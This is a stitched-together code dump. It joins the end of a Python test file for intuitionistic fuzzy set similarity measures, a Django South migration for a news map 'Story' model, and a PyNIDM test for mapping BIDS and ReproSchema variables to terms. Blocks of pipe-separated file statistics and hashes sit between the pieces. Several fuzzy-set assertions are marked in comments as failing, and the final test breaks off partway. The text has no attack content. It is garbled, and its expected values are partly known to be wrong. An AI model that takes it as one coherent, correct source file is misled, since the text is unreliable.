assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1),
0.391, decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.481,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.464,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1),
0.63, decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.46,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.395, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.829,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1),
0.451, decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.198,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.189,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.319,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.376,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.366,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.55,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.379,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.314, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.773,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.351,
decimal=3)
def test_nguyen():
# Example 1
M = IntuitionisticFuzzySet([1.0], [0.0], [0.0])
N = IntuitionisticFuzzySet([0.0], [1.0], [0.0])
N = IntuitionisticFuzzySet([0.0], [1.0], [0.0])
F = IntuitionisticFuzzySet([0.0], [0.0], [1.0])
assert_equal(nguyen(M, N), -1)
assert_equal(nguyen(M, F), 0.0)
R = IntuitionisticFuzzySet([0.5], [0.3], [0.2])
S = IntuitionisticFuzzySet([0.5], [0.2], [0.3])
assert_almost_equal(nguyen(M, R), 0.7, decimal=1)
assert_almost_equal(nguyen(M, S), 0.625, decimal=3)
# Example 2
A = IntuitionisticFuzzySet([0.3], [0.3], [0.4])
B = IntuitionisticFuzzySet([0.4], [0.4], [0.2])
assert_almost_equal(nguyen(A, B), 0.827, decimal=3)
A = IntuitionisticFuzzySet([0.3], [0.4], [0.3])
B = IntuitionisticFuzzySet([0.4], [0.3], [0.3])
assert_equal(nguyen(A, B), -1)
A = IntuitionisticFuzzySet([1.0], [0.0], [0.0])
B = IntuitionisticFuzzySet([0.0], [0.0], [1.0])
assert_equal(nguyen(A, B), 0.0)
A = IntuitionisticFuzzySet([0.5], [0.5], [0.0])
B = IntuitionisticFuzzySet([0.0], [0.0], [1.0])
assert_almost_equal(nguyen(A, B), 0.134, decimal=3)
A = IntuitionisticFuzzySet([0.4], [0.2], [0.4])
B = IntuitionisticFuzzySet([0.5], [0.3], [0.2])
assert_almost_equal(nguyen(A, B), 0.829, decimal=3)
A = IntuitionisticFuzzySet([0.4], [0.2], [0.4])
B = IntuitionisticFuzzySet([0.5], [0.2], [0.3])
assert_almost_equal(nguyen(A, B), 0.904, decimal=3)
A = IntuitionisticFuzzySet([0.0], [0.87], [0.13])
B = IntuitionisticFuzzySet([0.28], [0.55], [0.17])
assert_almost_equal(nguyen(A, B), 0.861, decimal=3)
A = IntuitionisticFuzzySet([0.6], [0.87], [-0.4])
B = IntuitionisticFuzzySet([0.28], [0.55], [0.17])
assert_almost_equal(nguyen(A, B), 0.960, decimal=3) # fails
# Example 3
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.35, 0.45, 0.55], [0.15, 0.25, 0.35], [0.5, 0.3, 0.1])
A3 = IntuitionisticFuzzySet([0.25, 0.35, 0.45], [0.25, 0.35, 0.45], [0.5, 0.3, 0.1])
B = IntuitionisticFuzzySet([0.3, 0.4, 0.5], [0.2, 0.3, 0.4], [0.5, 0.3, 0.1])
assert_almost_equal(nguyen(A1, B), 0.757, decimal=3)
assert_almost_equal(nguyen(A2, B), 0.994, decimal=3)
assert_almost_equal(nguyen(A3, B), 0.998, decimal=3)
# Example 4
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.3, 0.4, 0.2], [0.5, 0.4, 0.6], [0.2, 0.2, 0.2])
A3 = IntuitionisticFuzzySet([0.4, 0.3, 0.2], [0.4, 0.5, 0.6], [0.2, 0.2, 0.2])
B = IntuitionisticFuzzySet([0.3, 0.4, 0.5], [0.3, 0.4, 0.5], [0.4, 0.2, 0.0])
assert_almost_equal(nguyen(A1, B), 0.841, decimal=3)
assert_almost_equal(nguyen(A2, B), -0.988, decimal=3)
assert_almost_equal(nguyen(A3, B), -0.988, decimal=3)
def test_chen_cheng_lan():
A = IntuitionisticFuzzySet([0.3], [0.3])
B = IntuitionisticFuzzySet([0.4], [0.4])
assert_almost_equal(chen_cheng_lan(A, B), 0.9667, decimal=4)
A = IntuitionisticFuzzySet([0.3], [0.4])
B = IntuitionisticFuzzySet([0.4], [0.3])
assert_almost_equal(chen_cheng_lan(A, B), 0.9000, decimal=4)
A = IntuitionisticFuzzySet([1.0], [0.0])
B = IntuitionisticFuzzySet([0.0], [0.0])
assert_almost_equal(chen_cheng_lan(A, B), 0.5000, decimal=4)
A = IntuitionisticFuzzySet([0.5], [0.5])
B = IntuitionisticFuzzySet([0.0], [0.0])
assert_almost_equal(chen_cheng_lan(A, B), 0.8333, decimal=4)
A = IntuitionisticFuzzySet([0.4], [0.2])
B = IntuitionisticFuzzySet([0.5], [0.3])
assert_almost_equal(chen_cheng_lan(A, B), 0.9667, decimal=4)
A = IntuitionisticFuzzySet([0.4], [0.2])
B = IntuitionisticFuzzySet([0.5], [0.2])
assert_almost_equal(chen_cheng_lan(A, B), 0.9450, decimal=4)
# Table 2
A = IntuitionisticFuzzySet([0.5], [0.5])
B = IntuitionisticFuzzySet([0.0], [0.0])
assert_almost_equal(chen_cheng_lan(A, B), 0.8333, decimal=4)
A = IntuitionisticFuzzySet([0.6], [0.4])
B = IntuitionisticFuzzySet([0.0], [0.0])
assert_almost_equal(chen_cheng_lan(A, B), 0.8330, decimal=3)
A = IntuitionisticFuzzySet([0.0], [0.87])
B = IntuitionisticFuzzySet([0.28], [0.55])
assert_almost_equal(chen_cheng_lan(A, B), 0.7047, decimal=4)
A = IntuitionisticFuzzySet([0.6], [0.27])
B = IntuitionisticFuzzySet([0.28], [0.55])
assert_almost_equal(chen_cheng_lan(A, B), 0.6953, decimal=4)
# The examples below fails, most likely due to the rounding process of the authors
# Example 7.1
P1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
P2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
P3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
Q = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
assert_almost_equal(chen_cheng_lan(P1,Q), 0.7100, decimal=4)
assert_almost_equal(chen_cheng_lan(P2,Q), 0.7133, decimal=4)
assert_almost_equal(chen_cheng_lan(P3,Q), 0.8117, decimal=4)
# Example 7.2
P1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.1, 0.1, 0.9])
P2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.3, 0.8])
P3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.2, 0.8, 0.4])
Q = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.4, 0.2, 0.8])
assert_almost_equal(chen_cheng_lan(P1,Q), 0.8544, decimal=4)
assert_almost_equal(chen_cheng_lan(P2,Q), 0.9356, decimal=4)
assert_almost_equal(chen_cheng_lan(P3,Q), 0.5333, decimal=4)
# Example 7.3
P1 = IntuitionisticFuzzySet([0.5, 0.7, 0.4, 0.7], [0.3, 0.0, 0.5, 0.3])
P2 = IntuitionisticFuzzySet([0.5, 0.6, 0.2, 0.7], [0.2, 0.1, 0.7, 0.3])
P3 = IntuitionisticFuzzySet([0.5, 0.7, 0.4, 0.7], [0.4, 0.1, 0.6, 0.2])
Q = IntuitionisticFuzzySet([0.4, 0.7, 0.3, 0.7], [0.3, 0.1, 0.6, 0.3])
assert_almost_equal(chen_cheng_lan(P1,Q), 0.9413, decimal=4)
assert_almost_equal(chen_cheng_lan(P2,Q), 0.9150, decimal=4)
assert_almost_equal(chen_cheng_lan(P3,Q), 0.9504, decimal=4)
def test_muthukumar_krishnanb():
# all tests fail
F = IntuitionisticFuzzySet([0.3, 0.5, 0.6, 0.5, 0.7, 0.9, 0.7, 0.8, 0.6, 0.7, 0.7, 0.3], [0.0, 0.1, 0.3, 0.0, 0.1, 0.0, 0.1, 0.2, 0.2, 0.0, 0.2, 0.0])
G = IntuitionisticFuzzySet([0.8, 0.7, 0.5, 0.4, 0.9, 0.9, 0.8, 0.7, 0.5, 0.9, 0.6, 0.8], [0.1, 0.2, 0.2, 0.1, 0.0, 0.0, 0.0, 0.0, 0.3, 0.1, 0.1, 0.1])
assert_almost_equal(muthukumar_krishnanb(F, G), 0.81448, decimal=5)
F = IntuitionisticFuzzySet([0.6, 0.4, 0.8, 0.5, 0.7, 0.6, 0.8, 0.6, 0.9], [0.2, 0.5, 0.1, 0.3, 0.1, 0.3, 0.2, 0.0, 0.0])
G = IntuitionisticFuzzySet([0.5, 0.7, 0.6, 0.6, 0.4, 0.5, 0.9, 0.5, 0.8], [0.3, 0.0, 0.3, 0.2, 0.0, 0.1, 0.0, 0.1, 0.0])
H = IntuitionisticFuzzySet([0.4, 0.6, 0.5, 0.3, 0.7, 0.5, 0.2, 0.5, 0.1], [0.4, 0.2, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8])
assert_almost_equal(muthukumar_krishnanb(F, G), 0.8029, decimal=4)
assert_almost_equal(muthukumar_krishnanb(G, H), 0.4907, decimal=4)
assert_almost_equal(muthukumar_krishnanb(F, H), 0.4843, decimal=4)
M = IntuitionisticFuzzySet([0.6, 0.4, 0.8, 0.5, 0.7, 0.6, 0.8, 0.6, 0.9], [0.2, 0.5, 0.1, 0.3, 0.1, 0.3, 0.2, 0.0, 0.0])
P1 = IntuitionisticFuzzySet([0.5, 0.7, 0.6, 0.6, 0.4, 0.5, 0.9, 0.5, 0.8], [0.3, 0.0, 0.3, 0.2, 0.0, 0.1, 0.0, 0.1, 0.0])
P2 = IntuitionisticFuzzySet([0.2, 0.6, 0.5, 0.3, 0.7, 0.4, 0.2, 0.5, 0.1], [0.4, 0.2, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8])
P3 = IntuitionisticFuzzySet([0.5, 0.5, 0.3, 0.1, 0.3, 0.6, 0.3, 0.0, 0.2], [0.4, 0.0, 0.6, 0.8, 0.0, 0.2, 0.5, 0.2, 0.4])
P4 = IntuitionisticFuzzySet([0.3, 0.6, 0.2, 0.4, 0.2, 0.5, 0.3, 0.4, 0.2], [0.5, 0.0, 0.6, 0.5, 0.4, 0.0, 0.1, 0.0, 0.6])
P5 = IntuitionisticFuzzySet([0.5, 0.4, 0.6, 0.0, 0.3, 0.4, 0.1, 0.2, 0.4], [0.0, 0.0, 0.2, 0.2, 0.0, 0.0 ,0.5, 0.0, 0.4])
P6 = IntuitionisticFuzzySet([0.4, 0.6, 0.5, 0.3, 0.7, 0.5, 0.2, 0.5, 0.1], [0.4, 0.2, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8])
P7 = IntuitionisticFuzzySet([0.3, 0.7, 0.6, 0.5, 0.9, 0.7, 0.6, 0.7, 0.7], [0.0, 0.1, 0.2, 0.1, 0.0, 0.0, 0.3, 0.1, 0.2])
P8 = IntuitionisticFuzzySet([0.8, 0.9, 0.5, 0.7, 0.9, 0.9, 0.5, 0.8, 0.6], [0.1, 0.0, 0.3, 0.2, 0.0, 0.1, 0.2, 0.0, 0.1])
P9 = IntuitionisticFuzzySet([0.5, 0.8, 0.3, 0.4, 0.7, 0.8, 0.0, 0.4, 0.0], [0.0, 0.2, 0.0, 0.1, 0.0, 0.1, 0.8, 0.3, 0.7])
P10 = IntuitionisticFuzzySet([0.7, 0.4, 0.6, 0.5, 0.7, 0.6, 0.8, 0.6, 0.9], [0.2, 0.5, 0.1, 0.3, 0.1, 0.0, 0.2, 0.0, 0.0])
P11 = IntuitionisticFuzzySet([0.4, 0.7, 0.6, 0.6, 0.4, 0.5, 0.7, 0.5, 0.8], [0.3, 0.0, 0.3, 0.2, 0.0, 0.1, 0.2, 0.1, 0.0])
P12 = IntuitionisticFuzzySet([0.6, 0.5, 0.5, 0.3, 0.5, 0.4, 0.2, 0.5, 0.1], [0.4, 0.0, 0.1, 0.2, 0.1, 0.4, 0.0, 0.0, 0.8])
P13 = IntuitionisticFuzzySet([0.5, 0.6, 0.4, 0.5, 0.3, 0.2, 0.5, 0.4, 0.2], [0.3, 0.0, 0.3, 0.4, 0.2, 0.1, 0.0, 0.0, 0.5])
P14 = IntuitionisticFuzzySet([0.0, 0.4, 0.5, 0.4, 0.3, 0.4, 0.3, 0.4, 0.3], [0.5, 0.3, 0.2, 0.1, 0.2, 0.1, 0.1, 0.3, 0.5])
P15 = IntuitionisticFuzzySet([0.4, 0.2, 0.0, 0.0, 0.5, 0.4, 0.5, 0.2, 0.4], [0.0, 0.3, 0.2, 0.3, 0.2, 0.3, 0.3, 0.3, 0.4])
assert_almost_equal(muthukumar_krishnanb(P1, M), 0.8092, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P2, M), 0.4733, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P3, M), 0.3906, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P4, M), 0.4047, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P5, M), 0.4232, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P6, M), 0.5064, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P7, M), 0.7305, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P8, M), 0.7279, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P9, M), 0.4497, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P10, M), 0.9323, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P11, M), 0.8000, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P12, M), 0.4738, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P13, M), 0.5112, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P14, M), 0.4755, decimal=4)
assert_almost_equal(muthukumar_krishnanb(P15, M), 0.4625, decimal=4)
| 62.406481
| 154
| 0.683734
| 11,984
| 67,399
| 3.525701
| 0.039803
| 0.100753
| 0.123142
| 0.132917
| 0.919601
| 0.896265
| 0.879248
| 0.832884
| 0.811394
| 0.789028
| 0
| 0.114098
| 0.173741
| 67,399
| 1,079
| 155
| 62.464319
| 0.644616
| 0.0123
| 0
| 0.314836
| 0
| 0
| 0.000722
| 0
| 0
| 0
| 0
| 0
| 0.510759
| 1
| 0.024915
| false
| 0.001133
| 0.014723
| 0
| 0.039638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3f595fe53969c414c5560deb820dd0c8dad71fe
| 3,594
|
py
|
Python
|
geonewsloco/maploco/migrations/0003_auto__chg_field_story_headline__chg_field_story_popularity__chg_field_.py
|
robertjli/geo-news-map-loco
|
ae56e9293149a42cd560ad4646eeadfbc2865963
|
[
"MIT"
] | null | null | null |
geonewsloco/maploco/migrations/0003_auto__chg_field_story_headline__chg_field_story_popularity__chg_field_.py
|
robertjli/geo-news-map-loco
|
ae56e9293149a42cd560ad4646eeadfbc2865963
|
[
"MIT"
] | null | null | null |
geonewsloco/maploco/migrations/0003_auto__chg_field_story_headline__chg_field_story_popularity__chg_field_.py
|
robertjli/geo-news-map-loco
|
ae56e9293149a42cd560ad4646eeadfbc2865963
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Story.headline'
db.alter_column(u'maploco_story', 'headline', self.gf('django.db.models.fields.CharField')(max_length=100, null=True))
# Changing field 'Story.popularity'
db.alter_column(u'maploco_story', 'popularity', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'Story.lon'
db.alter_column(u'maploco_story', 'lon', self.gf('django.db.models.fields.FloatField')(null=True))
# Changing field 'Story.url'
db.alter_column(u'maploco_story', 'url', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
# Changing field 'Story.location_description'
db.alter_column(u'maploco_story', 'location_description', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
# Changing field 'Story.lat'
db.alter_column(u'maploco_story', 'lat', self.gf('django.db.models.fields.FloatField')(null=True))
# Changing field 'Story.blurb'
db.alter_column(u'maploco_story', 'blurb', self.gf('django.db.models.fields.CharField')(max_length=1000, null=True))
def backwards(self, orm):
# Changing field 'Story.headline'
db.alter_column(u'maploco_story', 'headline', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=100))
# Changing field 'Story.popularity'
db.alter_column(u'maploco_story', 'popularity', self.gf('django.db.models.fields.IntegerField')(default=-1))
# Changing field 'Story.lon'
db.alter_column(u'maploco_story', 'lon', self.gf('django.db.models.fields.FloatField')(default=-1))
# Changing field 'Story.url'
db.alter_column(u'maploco_story', 'url', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=255))
# Changing field 'Story.location_description'
db.alter_column(u'maploco_story', 'location_description', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=255))
# Changing field 'Story.lat'
db.alter_column(u'maploco_story', 'lat', self.gf('django.db.models.fields.FloatField')(default=-1))
# Changing field 'Story.blurb'
db.alter_column(u'maploco_story', 'blurb', self.gf('django.db.models.fields.CharField')(default='dummy', max_length=1000))
models = {
u'maploco.story': {
'Meta': {'object_name': 'Story'},
'blurb': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'headline': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'location_description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'lon': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'popularity': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['maploco']
| 50.619718
| 144
| 0.645242
| 449
| 3,594
| 5.055679
| 0.135857
| 0.081057
| 0.135683
| 0.193833
| 0.837885
| 0.834361
| 0.834361
| 0.813216
| 0.813216
| 0.771806
| 0
| 0.014696
| 0.166945
| 3,594
| 70
| 145
| 51.342857
| 0.743487
| 0.128269
| 0
| 0
| 0
| 0
| 0.426051
| 0.237729
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.114286
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3103dafe0a13ba4e5b9201613b19b89430d7fa1e
| 10,687
|
py
|
Python
|
nidm/experiment/tests/test_map_vars_to_terms.py
|
surchs/PyNIDM
|
bd3497a03060a74870aee3964bdacf39500aa941
|
[
"Apache-2.0"
] | 20
|
2017-11-25T19:34:02.000Z
|
2021-11-27T01:43:37.000Z
|
nidm/experiment/tests/test_map_vars_to_terms.py
|
surchs/PyNIDM
|
bd3497a03060a74870aee3964bdacf39500aa941
|
[
"Apache-2.0"
] | 100
|
2017-05-10T22:07:32.000Z
|
2021-12-09T20:14:13.000Z
|
nidm/experiment/tests/test_map_vars_to_terms.py
|
surchs/PyNIDM
|
bd3497a03060a74870aee3964bdacf39500aa941
|
[
"Apache-2.0"
] | 27
|
2017-05-10T21:54:59.000Z
|
2021-11-12T18:26:03.000Z
|
from pathlib import Path
import pytest
import pandas as pd
import json
import os
import urllib
import re
from nidm.experiment.Utils import map_variables_to_terms
import tempfile
from os.path import join
from nidm.core import Constants
from uuid import UUID
@pytest.fixture(scope="module", autouse="True")
def setup():
global DATA, REPROSCHEMA_JSON_MAP, BIDS_SIDECAR
temp = { 'participant_id': ['100', '101', '102', '103', '104', '105', '106', '107', '108', '109'],
'age': [18, 25, 30,19 ,35 ,20 ,27 ,29 ,38 ,27],
'sex': ['m', 'm', 'f', 'm', 'f', 'f', 'f', 'f', 'm','m'] }
DATA = pd.DataFrame(temp)
REPROSCHEMA_JSON_MAP = json.loads(
'''
{
"DD(source='participants.tsv', variable='participant_id')": {
"label": "participant_id",
"description": "subject/participant identifier",
"source_variable": "participant_id",
"responseOptions": {
"valueType": "http://www.w3.org/2001/XMLSchema#string"
},
"isAbout": [
{
"@id": "https://ndar.nih.gov/api/datadictionary/v2/dataelement/src_subject_id",
"label": "src_subject_id"
}
]
},
"DD(source='participants.tsv', variable='age')": {
"responseOptions": {
"unitCode": "years",
"minValue": "0",
"maxValue": "100",
"valueType": "http://www.w3.org/2001/XMLSchema#integer"
},
"label": "age",
"description": "age of participant",
"source_variable": "age",
"associatedWith": "NIDM",
"isAbout": [
{
"@id": "http://uri.interlex.org/ilx_0100400",
"label": "Age"
}
]
},
"DD(source='participants.tsv', variable='sex')": {
"responseOptions": {
"minValue": "NA",
"maxValue": "NA",
"unitCode": "NA",
"valueType": "http://www.w3.org/2001/XMLSchema#complexType",
"choices": {
"Male": "m",
"Female": "f"
}
},
"label": "sex",
"description": "biological sex of participant",
"source_variable": "sex",
"associatedWith": "NIDM",
"isAbout": [
{
"@id": "http://uri.interlex.org/ilx_0738439",
"label": "SEX"
}
]
}
}''')
BIDS_SIDECAR = json.loads(
'''
{
"age": {
"label": "age",
"description": "age of participant",
"source_variable": "age",
"associatedWith": "NIDM",
"isAbout": [
{
"@id": "http://uri.interlex.org/ilx_0100400",
"label": "Age"
}
],
"valueType": "http://www.w3.org/2001/XMLSchema#integer",
"minValue": "10",
"maxValue": "100"
},
"sex": {
"minValue": "NA",
"maxValue": "NA",
"unitCode": "NA",
"valueType": "http://www.w3.org/2001/XMLSchema#complexType",
"levels": {
"Male": "m",
"Female": "f"
},
"label": "sex",
"description": "biological sex of participant",
"source_variable": "sex",
"associatedWith": "NIDM",
"isAbout": [
{
"@id": "http://uri.interlex.org/ilx_0738439",
"label": "SEX"
}
]
}
}
''')
def test_map_vars_to_terms_BIDS():
'''
This function will test the Utils.py "map_vars_to_terms" function with a BIDS-formatted
JSON sidecar file
'''
global DATA, BIDS_SIDECAR
column_to_terms, cde = map_variables_to_terms(df=DATA,json_source=BIDS_SIDECAR,
directory=tempfile.gettempdir(),assessment_name="test",bids=True)
# check whether JSON mapping structure returned from map_variables_to_terms matches the
# reproshema structure
assert "DD(source='test', variable='age')" in column_to_terms.keys()
assert "DD(source='test', variable='sex')" in column_to_terms.keys()
assert "isAbout" in column_to_terms["DD(source='test', variable='age')"].keys()
assert "http://uri.interlex.org/ilx_0100400" == column_to_terms["DD(source='test', variable='age')"] \
['isAbout'][0]['@id']
assert "http://uri.interlex.org/ilx_0738439" == column_to_terms["DD(source='test', variable='sex')"] \
['isAbout'][0]['@id']
assert "responseOptions" in column_to_terms["DD(source='test', variable='sex')"].keys()
assert "choices" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions'].keys()
assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']
assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']
# now check the JSON sidecar file created by map_variables_to_terms which should match BIDS format
with open(join(tempfile.gettempdir(),"nidm_annotations.json")) as fp:
bids_sidecar = json.load(fp)
assert "age" in bids_sidecar.keys()
assert "sex" in bids_sidecar.keys()
assert "isAbout" in bids_sidecar["age"].keys()
assert "http://uri.interlex.org/ilx_0100400" == bids_sidecar["age"] \
['isAbout'][0]['@id']
assert "http://uri.interlex.org/ilx_0738439" == bids_sidecar["sex"] \
['isAbout'][0]['@id']
assert "levels" in bids_sidecar["sex"].keys()
assert "Male" in bids_sidecar["sex"]['levels'].keys()
assert "m" == bids_sidecar["sex"]['levels']['Male']
assert "Male" in bids_sidecar["sex"]['levels'].keys()
assert "m" == bids_sidecar["sex"]['levels']['Male']
# check the CDE dataelement graph for correct information
query = '''
prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>
select distinct ?uuid ?DataElements ?property ?value
where {
?uuid a/rdfs:subClassOf* nidm:DataElement ;
?property ?value .
}'''
qres=cde.query(query)
results=[]
for row in qres:
results.append(list(row))
assert len(results) == 20
def test_map_vars_to_terms_reproschema():
'''
This function will test the Utils.py "map_vars_to_terms" function with a reproschema-formatted
JSON sidecar file
'''
global DATA, REPROSCHEMA_JSON_MAP
column_to_terms, cde = map_variables_to_terms(df=DATA, json_source=REPROSCHEMA_JSON_MAP,
directory=tempfile.gettempdir(), assessment_name="test")
# check whether JSON mapping structure returned from map_variables_to_terms matches the
# reproshema structure
assert "DD(source='test', variable='age')" in column_to_terms.keys()
assert "DD(source='test', variable='sex')" in column_to_terms.keys()
assert "isAbout" in column_to_terms["DD(source='test', variable='age')"].keys()
assert "http://uri.interlex.org/ilx_0100400" == column_to_terms["DD(source='test', variable='age')"] \
['isAbout'][0]['@id']
assert "http://uri.interlex.org/ilx_0738439" == column_to_terms["DD(source='test', variable='sex')"] \
['isAbout'][0]['@id']
assert "responseOptions" in column_to_terms["DD(source='test', variable='sex')"].keys()
assert "choices" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions'].keys()
assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']
assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']
# now check the JSON mapping file created by map_variables_to_terms which should match Reproschema format
with open(join(tempfile.gettempdir(), "nidm_annotations.json")) as fp:
reproschema_json = json.load(fp)
assert "DD(source='test', variable='age')" in column_to_terms.keys()
assert "DD(source='test', variable='sex')" in column_to_terms.keys()
assert "isAbout" in column_to_terms["DD(source='test', variable='age')"].keys()
assert "http://uri.interlex.org/ilx_0100400" == column_to_terms["DD(source='test', variable='age')"] \
['isAbout'][0]['@id']
assert "http://uri.interlex.org/ilx_0738439" == column_to_terms["DD(source='test', variable='sex')"] \
['isAbout'][0]['@id']
assert "responseOptions" in column_to_terms["DD(source='test', variable='sex')"].keys()
assert "choices" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions'].keys()
assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']
assert "Male" in column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices'].keys()
assert "m" == column_to_terms["DD(source='test', variable='sex')"]['responseOptions']['choices']['Male']
# check the CDE dataelement graph for correct information
query = '''
prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>
select distinct ?uuid ?DataElements ?property ?value
where {
?uuid a/rdfs:subClassOf* nidm:DataElement ;
?property ?value .
}'''
